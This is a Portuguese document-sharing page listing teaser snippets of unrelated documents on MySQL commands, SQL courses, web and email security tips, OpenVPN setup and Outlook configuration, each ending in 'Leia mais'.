MYSQL - PRIMEIROS COMANDOS CRIAÇÃCO DO BD E DAS TABELAS, INSERÇÃO E CONSULTA DE REGISTROS. create database [if not exists] <nome>

MYSQL - PRIMEIROS COMANDOS CRIAÇÃCO DO BD E DAS TABELAS, INSERÇÃO E CONSULTA DE REGISTROS. create database [if not exists] <nome> 1. Manuseio do banco de dados MYSQL - PRIMEIROS COMANDOS CRIAÇÃCO DO BD E DAS TABELAS, INSERÇÃO E CONSULTA DE REGISTROS As seguintes instruções manuseiam o banco de dados: cria o banco mostra os bancos

Leia mais

SQuaRE system and software quality models security

SQuaRE system and software quality models security SQuaRE system and software quality models security Modelos de segurança de software e sistemas SQuaRE Ana L. Lima, Bruno M. Degardin, Igor A. A. Matias Qualidade de Software Prof. Dr. Nuno Pombo MEI UBI

Leia mais

Segurança em Sistemas Web. Addson A. Costa

Segurança em Sistemas Web. Addson A. Costa Segurança em Sistemas Web Addson A. Costa Spoofing de formulários Spoofing consiste em falsificação, por exemplo, na área de redes um computador pode roubar o IP de outro e assim fazer-se passar por ele.

Leia mais

Gmail - 5 dicas importantes de segurança que tem de conhecer

Gmail - 5 dicas importantes de segurança que tem de conhecer Gmail - 5 dicas importantes de segurança que tem de conhecer Date : 4 de Julho de 2017 Cada vez mais aparecem emails "insuspeitos" que podem atacar a sua vida. Na verdade o spam, phishing e malware já

Leia mais

COMPETÊNCIAS ESPECÍFICAS Compreender e utilizar a linguagem SQL, na construção e manutenção de uma base de dados.

COMPETÊNCIAS ESPECÍFICAS Compreender e utilizar a linguagem SQL, na construção e manutenção de uma base de dados. PLANIFICAÇÃO DA DISCIPLINA DE SISTEMAS DE INFORMAÇÃO 12.ºH CURSO PROFISSIONAL DE TÉCNICO MULTIMÉDIA ANO LECTIVO 2013/2014 6. LINGUAGENS DE PROGRAMAÇÃO IV Pré-requisitos: - Planificar e estruturar bases

Leia mais

nas Instituições de Ensino Superior Universidade de Aveiro Ricardo T. Martins 2018 / 04 / 13

nas Instituições de Ensino Superior Universidade de Aveiro Ricardo T. Martins 2018 / 04 / 13 Segurança da Informação nas Instituições de Ensino Superior Universidade de Aveiro Ricardo T. Martins ricardo@ua.pt 2018 / 04 / 13 Gestão da Segurança da Informação: Sistema Tecnologias Processos Pessoas

Leia mais

Conexão com Banco de Dados, Inserção, exclusão e atualização de registros

Conexão com Banco de Dados, Inserção, exclusão e atualização de registros Conexão com Banco de Dados, Inserção, exclusão e atualização de registros Vamos criar um banco de dados no MySQL. Inicie o WampServer Abra o HeidSQL Crie o código SQL para criar o banco de dados e a tabela.

Leia mais

DO BÁSICO AO AVANÇADO PARA MANIPULAÇÃO E OTIMIZAÇÃO DE DADOS. Fábio Roberto Octaviano

DO BÁSICO AO AVANÇADO PARA MANIPULAÇÃO E OTIMIZAÇÃO DE DADOS. Fábio Roberto Octaviano DO BÁSICO AO AVANÇADO PARA MANIPULAÇÃO E OTIMIZAÇÃO DE DADOS Fábio Roberto Octaviano Gerenciando Objetos com Visões do Dicionário de Dados Após o término do Capítulo: Utilizar as visões do Dicionário de

Leia mais

Rápida revisão do Modelo Relacional

Rápida revisão do Modelo Relacional Rápida revisão do Modelo Relacional Conceito de relação Tuplas e atributos Rápida revisão do Modelo Relacional Regras de integridade Entidade: Deve existir uma chave primária com valor único e não-nulo.

Leia mais

Aplicação Web Zend Framework 2 Cliente de Aplicação Asp.Net Web API

Aplicação Web Zend Framework 2 Cliente de Aplicação Asp.Net Web API Aplicação Web Zend Framework 2 Cliente de Aplicação Asp.Net Web API 1. Criar a Aplicação Asp.Net Web API 2 com Individual User Accounts Visual Studio 2015 > File > New > Project Visual C#, Web > ASP.NET

Leia mais

f. Exemplo: verificar condição de aprovação de alunos

f. Exemplo: verificar condição de aprovação de alunos Tecnologia em Análise e Desenvolvimento de Sistemas Disciplina: B1SGB - Sistemas Gerenciadores de Banco de Dados Memória de aula Semana 17 1) Expressões CASE a. Tem a mesma finalidade que nas linguagens

Leia mais

Internet. Explorar diferentes formas de informação disponível na Internet:

Internet. Explorar diferentes formas de informação disponível na Internet: A Internet Explorar diferentes formas de informação disponível na Internet: 1. O browser 2. Identificar os principais serviços da Internet; 3. Utilizar as funcionalidades de um browser para navegar na

Leia mais

Seguinte Contas de Correio Eletrónico Seguinte Ficheiro Definições da Conta Adicionar Conta Configuração da Conta Automática O Seu Nome

Seguinte Contas de Correio Eletrónico Seguinte Ficheiro Definições da Conta Adicionar Conta Configuração da Conta Automática O Seu Nome Como posso configurar o Outlook 2010?... 1 Configurar o correio eletrónico num iphone, ipad ou ipod Touch da Apple?... 2 Configurar o Correio Eletrónico num Android G1... 3 Configurar o Correio Eletrónico

Leia mais

Informática I. Aula 8. Aula 8-19/09/2007 1

Informática I. Aula 8.   Aula 8-19/09/2007 1 Informática I Aula 8 http://www.ic.uff.br/~bianca/informatica1/ Aula 8-19/09/2007 1 Ementa Noções Básicas de Computação (Hardware, Software e Internet) HTML e Páginas Web Internet e a Web Javascript e

Leia mais

POLÍTICA DE COOKIES. Como a maioria das páginas web, esta página usa cookies para:

POLÍTICA DE COOKIES. Como a maioria das páginas web, esta página usa cookies para: POLÍTICA DE COOKIES 1. O que são cookies? As cookies são ficheiros de software que as páginas web ou aplicações instalam nos browsers ou nos dispositivos (smartphone, tablet, entre outros) dos utilizadores

Leia mais

Instale facilmente o OpenVPN num Mac com o Tunnelblick

Instale facilmente o OpenVPN num Mac com o Tunnelblick Instale facilmente o OpenVPN num Mac com o Tunnelblick Date : 11 de Janeiro de 2017 Cada vez mais devemos considerar usar uma VPN para podermos garantir que não temos "espiões" no meio do nosso circuito

Leia mais

Banco de Dados. Conversão para o Banco de Dados SisMoura

Banco de Dados. Conversão para o Banco de Dados SisMoura Banco de Dados Conversão para o Banco de Dados SisMoura Objetivo : Converter as informações contidas em um determinado banco de dados para o banco de dados do Sismoura. Restaurar Banco de Dados em branco

Leia mais

José Antônio da Cunha

José Antônio da Cunha José Antônio da Cunha CEFET-RN Natal, 10 de maio de 2013 Auditando operações DML com OUPUT Imagine o seguinte cenário: você possui uma tabela muito importante em seu banco de dados e gostaria de implantar

Leia mais

OpenTouch Conversation One

OpenTouch Conversation One OpenTouch Conversation One Manual de utilizador R2.2 8AL90647PTABed02 1625 1. OpenTouch Conversation One... 3 2. Instalação... 3 3. Iniciar o OpenTouch Conversation... 3 3.1 Terminar sessão... 3 4. Página

Leia mais

Web Presentation Patterns - Controllers

Web Presentation Patterns - Controllers Instituto Superior Técnico 29 de Novembro de 2004 1 2 3 Page Controller Front Controller 4 5 Porquê Usar Web Applications Não necessita instalar software no cliente. Acesso universal fácil. Interface comum

Leia mais

Instruções para utilização dos Fóruns pelo Grupo dos Consensos Psiquiátricos para Clínicos Gerais 2005

Instruções para utilização dos Fóruns pelo Grupo dos Consensos Psiquiátricos para Clínicos Gerais 2005 Instruções para utilização dos Fóruns pelo Grupo dos Consensos Psiquiátricos para CONTEÚDO Pág. 1 Introdução 3 2 - Aceder ao site 2.1 Entrar em www.saude-mental.net 3 2.3 Introdução do seu login e password

Leia mais

igrpweb Índice gráfico Cliente NOSi igrpweb Referência Versão 1.00 Status

igrpweb Índice gráfico Cliente NOSi igrpweb Referência Versão 1.00 Status igrpweb Índice gráfico Cliente NOSi igrpweb Referência Versão 1.00 Status Conteúdo Enquadramento... 2 1 IGRP Studio... 3 2 O Guia Inicial Rápido... 4 3 O Gerador de Código... 5 4 O File editor... 6 5 BPMN

Leia mais

SMA PROCEDIMENTO DE ACESSO AO SISTEMA

SMA PROCEDIMENTO DE ACESSO AO SISTEMA SMA PROCEDIMENTO DE ACESSO AO SISTEMA Índice 1. Pré-requisitos... 2 2. Configurando opções de segurança do Internet Explorer... 3 3. Requisição e Instalação dos certificados de acesso... 5 3.1. Instalação

Leia mais

--========================================== MIRROR COM CERTIFICADO ===============================================

--========================================== MIRROR COM CERTIFICADO =============================================== -- ========================================================================================================== == --========================================== MIRROR COM CERTIFICADO ===============================================

Leia mais

Agrupamento Escolas de Alvalade. Nova plataforma de Microsoft Office 365. A. Instruções para acesso à plataforma de via web

Agrupamento Escolas de Alvalade. Nova plataforma de  Microsoft Office 365. A. Instruções para acesso à plataforma de  via web Nova plataforma de e-mail A. Instruções para acesso à plataforma de e-mail via web 1. Escolha um browser (Internet Explorer, Chrome, Firefox, Safari, ) 2. Aceda ao portal do agrupamento e digite o endereço

Leia mais